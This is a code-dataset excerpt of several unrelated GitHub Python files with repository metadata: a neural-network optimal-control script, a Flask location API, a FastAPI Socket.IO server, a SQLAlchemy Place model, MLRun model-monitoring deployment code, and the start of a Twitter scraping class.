k2 = -dt * (f(p + k1, t + dt)*(3*xs[i-1]**2-1)-3*xs[i-1])
return p + (k1 + k2) / 2.
def get_p(x):
t = 1.0
p = -2*(x[99]-1)/((x[99]-1)**2+1)**2
dt = 0.01
ps, ts = [p], [0.0]
def func(p, t):
return p
i = 99
while i > 0:
#print (i, t)
p = runge_kutta(p, t, dt, func, x, i)
i -= 1
t -= dt
ps.append(p)
ts.append(t)
return np.array([np.float32(pp) for pp in ps])
#%%
class MLP(nn.Module):
def __init__(self):#call the constractor class"Module" to perform necessary initialization.
super().__init__()
self.hidden1 = nn.Linear(1, 8)#hidden
self.hidden2 = nn.Linear(8, 16)#hidden
self.out = nn.Linear(16,1)#out put layer
#define the forward propagation of the model,how to return the required model output
#based on the input "t"(input t is "u")
def forward(self, u):
u = self.hidden1(u)
u = F.relu(u)
u = self.hidden2(u)
u = F.relu(u)
out = self.out(u)
return out
net = MLP()
#%%
t = torch.tensor(t)
t = t.to(torch.float32)
x = get_x(u)
p = get_p(x)
reversed_p = []
for i in reversed(p):
reversed_p.append(i)
print(reversed_p)
p = reversed_p
x = torch.tensor(x).to(torch.float32)
p = torch.tensor(p).to(torch.float32)
#%%
print(x)
print(p)
#%%
import numpy as np
import matplotlib.pylab as plt
#from gradient import numerical_gradient
Loss = []
lr =0.05
epoch = 1000
N = 20#iteration times
Q = 2*(x[99]-1)**2
print(Q)
dt = 0.01
dx= (x[1:]-x[0:-1])/dt
dp = (p[1:]-p[0:-1])/dt
rho = 1 #修正系数
updater = torch.optim.SGD(net.parameters(), lr) # change to adaptive
print(dx.shape)
#%%
def train():
for ii in range(epoch):
H = 0
for j in range(99):
t_j = t[j].reshape(1)
u_hat_j = net(torch.tensor(t_j))
x_j = x[j].reshape(1)
p_j = p[j].reshape(1)
H = H + p_j* (x_j-x_j**3+sigma*u_hat_j) - 0.5*(u_hat_j**2+1-3*x_j**2)-0.5*rho*(abs(dx[j]-x_j+x_j**3-sigma*u_hat_j)**2)+abs((dp[j]+p_j*(1-3*x_j**2)+3*x_j)**2)
l = -(H-Q)/100 # l>0
updater.zero_grad()
l.backward()
updater.step()
Loss.append(l.detach().item())
return
#%%
for k in range(N):
print(k)
U = [net(torch.tensor(t_j.reshape(1))) for t_j in t]
u_op = [u.detach().numpy() for u in U]
#print(u_op)
flatten_u_op = [element for sublist in u_op for element in sublist]
print(flatten_u_op)
x = get_x(flatten_u_op)
p = get_p(x)
reversed_p = []
for i in reversed(p):
reversed_p.append(i)
p = reversed_p
x = torch.tensor(x).to(torch.float32)
p = torch.tensor(p).to(torch.float32)
train()
print(x)
#%%
x = t
y = flatten_u_op
#y = list(map(lambda x:x.detach().numpy(), y))
plt.title("optimal control")
plt.xlabel("Time")
plt.ylabel("u")
plt.plot(x, y)
plt.show()
#%%
x = get_x(y)
print(x)
#%%
import scipy.io as scio
scio.savemat('pathway_data.mat',{'x':x})
| Cecilia-ChenJY/PMP-for-Optimal-Control | double_well.py | double_well.py | py | 4,448 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
... |
6530887784 | # FLASK: location API functions
from flask import Flask, jsonify, request
import pymysql
from __main__ import app
from helpers.location import *
from db_connect.db_connection import connect
# Open database connection
db = connect()
cursor = db.cursor()
# New payment or get payments to a tutor
@app.route("/location", methods=['GET','POST'])
def location():
# Retrieve parameters
dist = request.args.get('District')
city = request.args.get('City')
country = request.args.get('Country')
# Find locations
if request.method == 'GET':
cursor.execute(get_location(dist, city, country))
return jsonify(cursor.fetchall())
# Create new location in database
elif request.method == 'POST':
pc = request.args.get('PostalCode')
cursor.execute(new_location(pc, dist, city, country))
db.commit()
return jsonify("Success!")
| judgyknowitall/DataBaseProject | venvProject/apis/location_route.py | location_route.py | py | 897 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "db_connect.db_connection.connect",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 20,
"usage_type": "attribute"
},
{
"a... |
10858226319 | import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from sockets import sio_app
app = FastAPI()
app.mount('/', app=sio_app)
app.add_middleware(
CORSMiddleware,
allow_origins=['*'],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get('/')
async def home():
return {'message': 'Hello👋 Developers💻'}
if __name__ == '__main__':
uvicorn.run('main:app', reload=True)
| jrdeveloper124/socketio-app | server/main.py | main.py | py | 468 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sockets.sio_app",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "fastapi.middleware.cors.CORSMiddleware",
"line_number": 10,
"usage_type": "argument"
},
{
"api_name... |
37949950597 | #!/usr/bin/python3
"""This module defines the class Place that inherits from class BaseModel"""
from models.base_model import BaseModel, Base
from sqlalchemy import Column, String, Integer, Float, ForeignKey
from sqlalchemy.orm import relationship
from sqlalchemy.sql.schema import Table
import os
if os.getenv('HBNB_TYPE_STORAGE') == 'db':
place_amenity = Table('place_amenity',
Base.metadata,
Column('place_id',
String(60),
ForeignKey('places.id'),
primary_key=True,
nullable=False),
Column('amenity_id',
String(60),
ForeignKey('amenities.id'),
primary_key=True,
nullable=False))
class Place(BaseModel, Base):
"""Defines the methods and attributes of the class"""
__tablename__ = 'places'
if os.getenv('HBNB_TYPE_STORAGE') == 'db':
city_id = Column(String(60), ForeignKey('cities.id'), nullable=False)
user_id = Column(String(60), ForeignKey('users.id'), nullable=False)
name = Column(String(128), nullable=False)
description = Column(String(1024), nullable=False)
number_rooms = Column(Integer, nullable=False, default=0)
number_bathrooms = Column(Integer, nullable=False, default=0)
max_guest = Column(Integer, nullable=False, default=0)
price_by_night = Column(Integer, nullable=False, default=0)
latitude = Column(Float, nullable=True)
longitude = Column(Float, nullable=True)
reviews = relationship('Review', backref='place',
cascade='all, delete, delete-orphan')
amenities = relationship('Amenity', backref='place_amenities',
secondary=place_amenity, viewonly=False)
else:
city_id = ""
user_id = ""
name = ""
description = ""
number_rooms = 0
number_bathrooms = 0
max_guest = 0
price_by_night = 0
latitude = 0.0
longitude = 0.0
amenity_ids = []
@property
def reviews(self):
"""
Returns the list of Review instances with place_id equals
to the current place.id.
"""
from models import storage
from models.review import Review
review_of_place = []
review_dict = storage.all(Review)
for obj in review_dict.values():
if obj.place_id == self.id:
review_of_place.append(obj)
return review_of_place
@property
def amenities(self):
"""
Returns the list of Amenity instances based on the attribute
amenity_ids that contains all Amenity.id linked to the place
"""
from models import storage
from models.amenity import Amenity
amenities_of_place = []
amenity_dict = storage.all(Amenity)
for obj in amenity_dict.values():
if obj.id in self.amenity_ids:
amenities_of_place.append(obj)
return amenities_of_place
@amenities.setter
def amenities(self, obj):
"""Append amenity 'id' to the list of amenity ids"""
if type(obj) != Amenity:
return
if obj.id not in self.amenity_ids:
self.amenity_ids.append(obj.id)
def __init__(self, *args, **kwargs):
"""Initializes the attributes of the class"""
super().__init__(*args, **kwargs)
| Chiemelie10/AirBnB_Practice_v2 | models/place.py | place.py | py | 3,794 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getenv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.sql.schema.Table",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "models.base_model.Base.metadata",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_na... |
22354032685 | import pathlib
import typing
import sqlalchemy.orm
from fastapi import Depends
import mlrun.common.schemas.model_monitoring
import mlrun.common.schemas.model_monitoring.constants as mm_constants
import mlrun.model_monitoring.stream_processing
import mlrun.model_monitoring.tracking_policy
import server.api.api.endpoints.functions
import server.api.api.utils
import server.api.crud.model_monitoring.helpers
import server.api.utils.scheduler
import server.api.utils.singletons.k8s
from mlrun import feature_store as fstore
from mlrun.model_monitoring.writer import ModelMonitoringWriter
from mlrun.utils import logger
from server.api.api import deps
from server.api.crud.model_monitoring.helpers import Seconds, seconds2minutes
_MODEL_MONITORING_COMMON_PATH = (
pathlib.Path(__file__).parents[4] / "mlrun" / "model_monitoring"
)
_STREAM_PROCESSING_FUNCTION_PATH = (
_MODEL_MONITORING_COMMON_PATH / "stream_processing.py"
)
_MONITORING_ORIGINAL_BATCH_FUNCTION_PATH = _MODEL_MONITORING_COMMON_PATH / "batch.py"
_MONITORING_APPLICATION_CONTROLLER_FUNCTION_PATH = (
_MODEL_MONITORING_COMMON_PATH / "controller_handler.py"
)
_MONITORING_WRITER_FUNCTION_PATH = _MODEL_MONITORING_COMMON_PATH / "writer.py"
class MonitoringDeployment:
def __init__(
self,
parquet_batching_max_events: int = mlrun.mlconf.model_endpoint_monitoring.parquet_batching_max_events,
max_parquet_save_interval: int = mlrun.mlconf.model_endpoint_monitoring.parquet_batching_timeout_secs,
) -> None:
self._parquet_batching_max_events = parquet_batching_max_events
self._max_parquet_save_interval = max_parquet_save_interval
"""
Initialize a MonitoringDeployment object, which handles the deployment & scheduling of:
1. model monitoring stream
2. model monitoring batch
3. model monitoring batch application
4. model monitoring writer
:param parquet_batching_max_events: Maximum number of events that will be used for writing the monitoring
parquet by the monitoring stream function.
:param max_parquet_save_interval: Maximum number of seconds to hold events before they are written to the
monitoring parquet target. Note that this value will be used to handle the
offset by the scheduled batch job.
"""
def deploy_monitoring_functions(
self,
project: str,
model_monitoring_access_key: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
):
"""
Invoking monitoring deploying functions.
:param project: The name of the project.
:param model_monitoring_access_key: Access key to apply the model monitoring process.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations.
"""
self.deploy_model_monitoring_stream_processing(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
db_session=db_session,
auth_info=auth_info,
tracking_policy=tracking_policy,
)
self.deploy_model_monitoring_batch_processing(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
db_session=db_session,
auth_info=auth_info,
tracking_policy=tracking_policy,
tracking_offset=Seconds(self._max_parquet_save_interval),
function_name=mm_constants.MonitoringFunctionNames.BATCH,
)
def deploy_model_monitoring_stream_processing(
self,
project: str,
model_monitoring_access_key: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
) -> None:
"""
Deploying model monitoring stream real time nuclio function. The goal of this real time function is
to monitor the log of the data stream. It is triggered when a new log entry is detected.
It processes the new events into statistics that are then written to statistics databases.
:param project: The name of the project.
:param model_monitoring_access_key: Access key to apply the model monitoring process.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations.
"""
logger.info(
"Checking if model monitoring stream is already deployed",
project=project,
)
try:
# validate that the model monitoring stream has not yet been deployed
mlrun.runtimes.function.get_nuclio_deploy_status(
name="model-monitoring-stream",
project=project,
tag="",
auth_info=auth_info,
)
logger.info(
"Detected model monitoring stream processing function already deployed",
project=project,
)
return
except mlrun.errors.MLRunNotFoundError:
logger.info(
"Deploying model monitoring stream processing function", project=project
)
# Get parquet target value for model monitoring stream function
parquet_target = (
server.api.crud.model_monitoring.helpers.get_monitoring_parquet_path(
db_session=db_session, project=project
)
)
fn = self._initial_model_monitoring_stream_processing_function(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
tracking_policy=tracking_policy,
auth_info=auth_info,
parquet_target=parquet_target,
)
# Adding label to the function - will be used to identify the stream pod
fn.metadata.labels = {"type": "model-monitoring-stream"}
server.api.api.endpoints.functions._build_function(
db_session=db_session,
auth_info=auth_info,
function=fn,
)
def deploy_model_monitoring_controller(
self,
project: str,
model_monitoring_access_key: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
) -> typing.Union[mlrun.runtimes.kubejob.KubejobRuntime, None]:
"""
Submit model monitoring application controller job along with deploying the model monitoring writer function.
While the main goal of the controller job is to handle the monitoring processing and triggering applications,
the goal of the model monitoring writer function is to write all the monitoring application results to the
databases. Note that the default scheduling policy of the controller job is to run every 5 min.
:param project: The name of the project.
:param model_monitoring_access_key: Access key to apply the model monitoring process.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations, including the required controller
configurations such as the base period (5 minutes by default) and
the default controller image (`mlrun/mlrun` by default).
:return: Model monitoring controller job as a runtime function.
"""
self.deploy_model_monitoring_writer_application(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
db_session=db_session,
auth_info=auth_info,
tracking_policy=tracking_policy,
)
return self.deploy_model_monitoring_batch_processing(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
db_session=db_session,
auth_info=auth_info,
tracking_policy=tracking_policy,
function_name=mm_constants.MonitoringFunctionNames.APPLICATION_CONTROLLER,
)
def deploy_model_monitoring_batch_processing(
self,
project: str,
model_monitoring_access_key: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
with_schedule: bool = True,
overwrite: bool = False,
tracking_offset: Seconds = Seconds(0),
function_name: str = mm_constants.MonitoringFunctionNames.BATCH,
) -> typing.Union[mlrun.runtimes.kubejob.KubejobRuntime, None]:
"""
Deploying model monitoring batch job.
The goal of this job is to identify drift in the data based on the latest batch of events. By default,
this job is executed on the hour every hour.
Note that if this job was already deployed then you will either have to pass overwrite=True or
to delete the old job before deploying a new one.
:param project: The name of the project.
:param model_monitoring_access_key: Access key to apply the model monitoring process.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations.
:param with_schedule: If true, submit a scheduled batch drift job.
:param overwrite: If true, overwrite the existing model monitoring batch job.
:param tracking_offset: Offset for the tracking policy (for synchronization with the stream)
:param function_name: model-monitoring-batch or model-monitoring-controller
indicates witch one to deploy.
:return: Model monitoring batch job as a runtime function.
"""
job_valid_names = [
mm_constants.MonitoringFunctionNames.BATCH,
mm_constants.MonitoringFunctionNames.APPLICATION_CONTROLLER,
]
if function_name not in job_valid_names:
raise mlrun.errors.MLRunRuntimeError(
f"Model Monitoring batch job can be only within {job_valid_names}"
)
fn = None
if not overwrite:
logger.info(
f"Checking if {function_name.replace('-',' ')} processing function is already deployed",
project=project,
)
# Try to list functions that named model monitoring batch
# to make sure that this job has not yet been deployed
try:
fn = server.api.crud.Functions().get_function(
db_session=db_session,
name=function_name,
project=project,
)
logger.info(
f"Detected {function_name.replace('-',' ')} processing function already deployed",
project=project,
)
except mlrun.errors.MLRunNotFoundError:
logger.info(
f"Deploying {function_name.replace('-',' ')} processing function ",
project=project,
)
if not fn:
# Create a monitoring batch job function object
fn = self._get_model_monitoring_batch_function(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
db_session=db_session,
auth_info=auth_info,
image=tracking_policy.default_batch_image
if function_name == mm_constants.MonitoringFunctionNames.BATCH
else tracking_policy.default_controller_image,
function_name=function_name,
)
# Get the function uri
function_uri = fn.save(versioned=True)
if with_schedule:
if not overwrite:
try:
server.api.utils.scheduler.Scheduler().get_schedule(
db_session=db_session,
project=project,
name=function_name,
)
logger.info(
f"Already deployed {function_name.replace('-',' ')} scheduled job function ",
project=project,
)
return
except mlrun.errors.MLRunNotFoundError:
logger.info(
f"Deploying {function_name.replace('-',' ')} scheduled job function ",
project=project,
)
# Submit batch scheduled job
self._submit_schedule_batch_job(
project=project,
function_uri=function_uri,
db_session=db_session,
auth_info=auth_info,
tracking_policy=tracking_policy,
tracking_offset=tracking_offset,
function_name=function_name,
)
return fn
def deploy_model_monitoring_writer_application(
self,
project,
model_monitoring_access_key,
db_session,
auth_info,
tracking_policy,
):
"""
Deploying model monitoring writer real time nuclio function. The goal of this real time function is
to write all the monitoring application result to the databases. It is triggered by those applications.
It processes and writes the result to the databases.
:param project: The name of the project.
:param model_monitoring_access_key: Access key to apply the model monitoring process.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations.
"""
logger.info(
"Checking if model monitoring writer is already deployed",
project=project,
)
try:
# validate that the model monitoring stream has not yet been deployed
mlrun.runtimes.function.get_nuclio_deploy_status(
name=mm_constants.MonitoringFunctionNames.WRITER,
project=project,
tag="",
auth_info=auth_info,
)
logger.info(
"Detected model monitoring writer processing function already deployed",
project=project,
)
return
except mlrun.errors.MLRunNotFoundError:
logger.info(
"Deploying model monitoring writer processing function", project=project
)
fn = self._initial_model_monitoring_writer_function(
project=project,
model_monitoring_access_key=model_monitoring_access_key,
tracking_policy=tracking_policy,
auth_info=auth_info,
)
# Adding label to the function - will be used to identify the stream pod
fn.metadata.labels = {"type": "model-monitoring-writer"}
server.api.api.endpoints.functions._build_function(
db_session=db_session,
auth_info=auth_info,
function=fn,
)
def _initial_model_monitoring_stream_processing_function(
self,
project: str,
model_monitoring_access_key: str,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
auth_info: mlrun.common.schemas.AuthInfo,
parquet_target: str,
):
"""
Initialize model monitoring stream processing function.
:param project: Project name.
:param model_monitoring_access_key: Access key to apply the model monitoring process. Please note that in CE
deployments this parameter will be None.
:param tracking_policy: Model monitoring configurations.
:param auth_info: The auth info of the request.
:param parquet_target: Path to model monitoring parquet file that will be generated by the
monitoring stream nuclio function.
:return: A function object from a mlrun runtime class
"""
# Initialize Stream Processor object
stream_processor = (
mlrun.model_monitoring.stream_processing.EventStreamProcessor(
project=project,
parquet_batching_max_events=self._parquet_batching_max_events,
parquet_batching_timeout_secs=self._max_parquet_save_interval,
parquet_target=parquet_target,
model_monitoring_access_key=model_monitoring_access_key,
)
)
# Create a new serving function for the streaming process
function = mlrun.code_to_function(
name="model-monitoring-stream",
project=project,
filename=str(_STREAM_PROCESSING_FUNCTION_PATH),
kind="serving",
image=tracking_policy.stream_image,
)
# Create monitoring serving graph
stream_processor.apply_monitoring_serving_graph(function)
# Set the project to the serving function
function.metadata.project = project
# Add stream triggers
function = self._apply_stream_trigger(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
)
# Apply feature store run configurations on the serving function
run_config = fstore.RunConfig(function=function, local=False)
function.spec.parameters = run_config.parameters
return function
def _get_model_monitoring_batch_function(
self,
project: str,
model_monitoring_access_key: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
image: str,
function_name: str = "model-monitoring-batch",
):
"""
Initialize model monitoring batch function.
:param project: project name.
:param model_monitoring_access_key: access key to apply the model monitoring process. Please note that in CE
deployments this parameter will be None.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param image: Base docker image to use for building the function container
:param function_name: model-monitoring-batch or model-monitoring-controller
indicates witch one to create.
:return: A function object from a mlrun runtime class
"""
filename = (
str(_MONITORING_ORIGINAL_BATCH_FUNCTION_PATH)
if function_name == "model-monitoring-batch"
else str(_MONITORING_APPLICATION_CONTROLLER_FUNCTION_PATH)
)
# Create job function runtime for the model monitoring batch
function: mlrun.runtimes.KubejobRuntime = mlrun.code_to_function(
name=function_name,
project=project,
filename=filename,
kind="job",
image=image,
handler="handler",
)
function.set_db_connection(server.api.api.utils.get_run_db_instance(db_session))
# Set the project to the job function
function.metadata.project = project
if not mlrun.mlconf.is_ce_mode():
function = self._apply_access_key_and_mount_function(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
function_name=function_name,
)
# Enrich runtime with the required configurations
server.api.api.utils.apply_enrichment_and_validation_on_function(
function, auth_info
)
return function
@classmethod
def _submit_schedule_batch_job(
cls,
project: str,
function_uri: str,
db_session: sqlalchemy.orm.Session,
auth_info: mlrun.common.schemas.AuthInfo,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
tracking_offset: Seconds = Seconds(0),
function_name: str = "model-monitoring-batch",
):
"""
Create a new scheduled monitoring batch job analysis based on the model-monitoring-batch function that has
been already registered.
:param project: Project name.
:param function_uri: Function URI of the registered model monitoring batch job. This URI includes the
related project name, function name, and hash key.
:param db_session: A session that manages the current dialog with the database.
:param auth_info: The auth info of the request.
:param tracking_policy: Model monitoring configurations.
:param tracking_offset: Offset for the tracking policy (for synchronization with the stream).
"""
function_uri = function_uri.replace("db://", "")
task = mlrun.new_task(name=function_name, project=project)
task.spec.function = function_uri
schedule, batch_dict = cls._generate_schedule_and_interval_dict(
function_name=function_name,
tracking_policy=tracking_policy,
tracking_offset=tracking_offset,
)
task.spec.parameters[
mlrun.common.schemas.model_monitoring.EventFieldType.BATCH_INTERVALS_DICT
] = batch_dict
data = {
"task": task.to_dict(),
"schedule": schedule,
}
logger.info(
f"Deploying {function_name.replace('-',' ')} processing function",
project=project,
)
# Add job schedule policy (every hour by default)
server.api.api.utils.submit_run_sync(
db_session=db_session, auth_info=auth_info, data=data
)
@classmethod
def _generate_schedule_and_interval_dict(
cls,
function_name: str,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
tracking_offset: Seconds,
) -> typing.Tuple[str, typing.Dict[str, int]]:
"""Generate schedule cron string along with the batch interval dictionary according to the providing
function name. As for the model monitoring controller function, the dictionary batch interval is
corresponding to the scheduling policy.
:param tracking_policy: Model monitoring configurations.
:param tracking_offset: Offset for the tracking policy (for synchronization with the stream).
:return: A tuple of:
[0] = Schedule cron string
[1] = Dictionary of the batch interval.
"""
if function_name == mm_constants.MonitoringFunctionNames.BATCH:
# Apply batching interval params
interval_list = [
tracking_policy.default_batch_intervals.minute,
tracking_policy.default_batch_intervals.hour,
tracking_policy.default_batch_intervals.day,
]
(
minutes,
hours,
days,
) = server.api.crud.model_monitoring.helpers.get_batching_interval_param(
interval_list
)
schedule = server.api.crud.model_monitoring.helpers.convert_to_cron_string(
tracking_policy.default_batch_intervals,
minute_delay=seconds2minutes(tracking_offset),
)
else:
# Apply monitoring controller params
minutes = tracking_policy.base_period
hours = days = 0
schedule = f"*/{tracking_policy.base_period} * * * *"
batch_dict = {
mm_constants.EventFieldType.MINUTES: minutes,
mm_constants.EventFieldType.HOURS: hours,
mm_constants.EventFieldType.DAYS: days,
}
return schedule, batch_dict
def _apply_stream_trigger(
self,
project: str,
function: mlrun.runtimes.ServingRuntime,
model_monitoring_access_key: str = None,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
function_name: str = None,
) -> mlrun.runtimes.ServingRuntime:
"""Adding stream source for the nuclio serving function. By default, the function has HTTP stream trigger along
with another supported stream source that can be either Kafka or V3IO, depends on the stream path schema that is
defined under mlrun.mlconf.model_endpoint_monitoring.store_prefixes. Note that if no valid stream path has been
provided then the function will have a single HTTP stream source.
:param project: Project name.
:param function: The serving function object that will be applied with the stream trigger.
:param model_monitoring_access_key: Access key to apply the model monitoring stream function when the stream is
schema is V3IO.
:param auth_info: The auth info of the request.
:param function_name: the name of the function that be applied with the stream trigger,
None for model_monitoring_stream
:return: ServingRuntime object with stream trigger.
"""
# Get the stream path from the configuration
# stream_path = mlrun.mlconf.get_file_target_path(project=project, kind="stream", target="stream")
stream_path = server.api.crud.model_monitoring.get_stream_path(
project=project, application_name=function_name
)
if stream_path.startswith("kafka://"):
topic, brokers = mlrun.datastore.utils.parse_kafka_url(url=stream_path)
# Generate Kafka stream source
stream_source = mlrun.datastore.sources.KafkaSource(
brokers=brokers,
topics=[topic],
)
function = stream_source.add_nuclio_trigger(function)
if not mlrun.mlconf.is_ce_mode():
function = self._apply_access_key_and_mount_function(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
function_name=function_name,
)
if stream_path.startswith("v3io://"):
# Generate V3IO stream trigger
function.add_v3io_stream_trigger(
stream_path=stream_path,
name="monitoring_stream_trigger"
if function_name is None
else f"monitoring_{function_name}_trigger",
access_key=model_monitoring_access_key
if function_name != mm_constants.MonitoringFunctionNames.STREAM
else None,
)
# Add the default HTTP source
http_source = mlrun.datastore.sources.HttpSource()
function = http_source.add_nuclio_trigger(function)
return function
@staticmethod
def _apply_access_key_and_mount_function(
project: str,
function: typing.Union[
mlrun.runtimes.KubejobRuntime, mlrun.runtimes.ServingRuntime
],
model_monitoring_access_key: str,
auth_info: mlrun.common.schemas.AuthInfo,
function_name: str = None,
) -> typing.Union[mlrun.runtimes.KubejobRuntime, mlrun.runtimes.ServingRuntime]:
"""Applying model monitoring access key on the provided function when using V3IO path. In addition, this method
mount the V3IO path for the provided function to configure the access to the system files.
:param project: Project name.
:param function: Model monitoring function object that will be filled with the access key and
the access to the system files.
:param model_monitoring_access_key: Access key to apply the model monitoring stream function when the stream is
schema is V3IO.
:param auth_info: The auth info of the request.
:return: function runtime object with access key and access to system files.
"""
if function_name in mm_constants.MonitoringFunctionNames.all():
# Set model monitoring access key for managing permissions
function.set_env_from_secret(
mlrun.common.schemas.model_monitoring.ProjectSecretKeys.ACCESS_KEY,
server.api.utils.singletons.k8s.get_k8s_helper().get_project_secret_name(
project
),
server.api.crud.secrets.Secrets().generate_client_project_secret_key(
server.api.crud.secrets.SecretsClientType.model_monitoring,
mlrun.common.schemas.model_monitoring.ProjectSecretKeys.ACCESS_KEY,
),
)
function.metadata.credentials.access_key = model_monitoring_access_key
function.apply(mlrun.v3io_cred())
# Ensure that the auth env vars are set
server.api.api.utils.ensure_function_has_auth_set(function, auth_info)
return function
def _initial_model_monitoring_writer_function(
self, project, model_monitoring_access_key, tracking_policy, auth_info
):
"""
Initialize model monitoring writer function.
:param project: Project name.
:param model_monitoring_access_key: Access key to apply the model monitoring process. Please note that in CE
deployments this parameter will be None.
:param tracking_policy: Model monitoring configurations.
:param auth_info: The auth info of the request.
:return: A function object from a mlrun runtime class
"""
# Create a new serving function for the streaming process
function = mlrun.code_to_function(
name=mm_constants.MonitoringFunctionNames.WRITER,
project=project,
filename=str(_MONITORING_WRITER_FUNCTION_PATH),
kind="serving",
image=tracking_policy.default_controller_image,
)
# Create writer monitoring serving graph
graph = function.set_topology("flow")
graph.to(ModelMonitoringWriter(project=project)).respond() # writer
# Set the project to the serving function
function.metadata.project = project
# create v3io stream for model_monitoring_writer | model monitoring application
server.api.api.endpoints.functions.create_model_monitoring_stream(
project=project,
function=function,
monitoring_application=mm_constants.MonitoringFunctionNames.WRITER,
stream_path=server.api.crud.model_monitoring.get_stream_path(
project=project,
application_name=mm_constants.MonitoringFunctionNames.WRITER,
),
access_key=model_monitoring_access_key,
)
# Add stream triggers
function = self._apply_stream_trigger(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
function_name=mm_constants.MonitoringFunctionNames.WRITER,
)
# Apply feature store run configurations on the serving function
run_config = fstore.RunConfig(function=function, local=False)
function.spec.parameters = run_config.parameters
return function
def get_endpoint_features(
feature_names: typing.List[str],
feature_stats: dict = None,
current_stats: dict = None,
) -> typing.List[mlrun.common.schemas.Features]:
"""
Getting a new list of features that exist in feature_names along with their expected (feature_stats) and
actual (current_stats) stats. The expected stats were calculated during the creation of the model endpoint,
usually based on the data from the Model Artifact. The actual stats are based on the results from the latest
model monitoring batch job.
param feature_names: List of feature names.
param feature_stats: Dictionary of feature stats that were stored during the creation of the model endpoint
object.
param current_stats: Dictionary of the latest stats that were stored during the last run of the model monitoring
batch job.
return: List of feature objects. Each feature has a name, weight, expected values, and actual values. More info
can be found under `mlrun.common.schemas.Features`.
"""
# Initialize feature and current stats dictionaries
safe_feature_stats = feature_stats or {}
safe_current_stats = current_stats or {}
# Create feature object and add it to a general features list
features = []
for name in feature_names:
if feature_stats is not None and name not in feature_stats:
logger.warn("Feature missing from 'feature_stats'", name=name)
if current_stats is not None and name not in current_stats:
logger.warn("Feature missing from 'current_stats'", name=name)
f = mlrun.common.schemas.Features.new(
name, safe_feature_stats.get(name), safe_current_stats.get(name)
)
features.append(f)
return features
| mlrun/mlrun | server/api/crud/model_monitoring/deployment.py | deployment.py | py | 35,326 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "mlrun.common.schemas.model_monitoring.mlconf",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "mlrun.common.schemas.model_monitoring",
"line_number": 40,
"usage_type": "... |
29147272703 | # TODO
# urrlib <-> requests
import requests
from .http_helper import TwitterHttpHelper as HttpHelper
from urllib.parse import quote
from orderedset import OrderedSet
from lxml.html import document_fromstring
from lxml.etree import tostring, ParserError
import time
import re
class CircularOrderedSet(OrderedSet):
def __init__(self, size=0):
super(CircularOrderedSet, self).__init__()
self.size = size
def add(self, value):
super(CircularOrderedSet, self).add(value)
self._truncate()
def _truncate(self):
if len(self) > self.size:
self.pop(last=False)
class BlueBird:
API_WEB = 'web'
API_1_1 = '1_1'
API_2 = '2'
emoji_flag = '24f2c44c'
emoji_regex = re.compile(r'alt="(.{0,8})"')
img_regex = re.compile(r'<img([\w\W]+?)/>')
ACCESS_TOKEN = 'AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA'
def __init__(self):
self.guest_tokens = list()
self._request_guest_token()
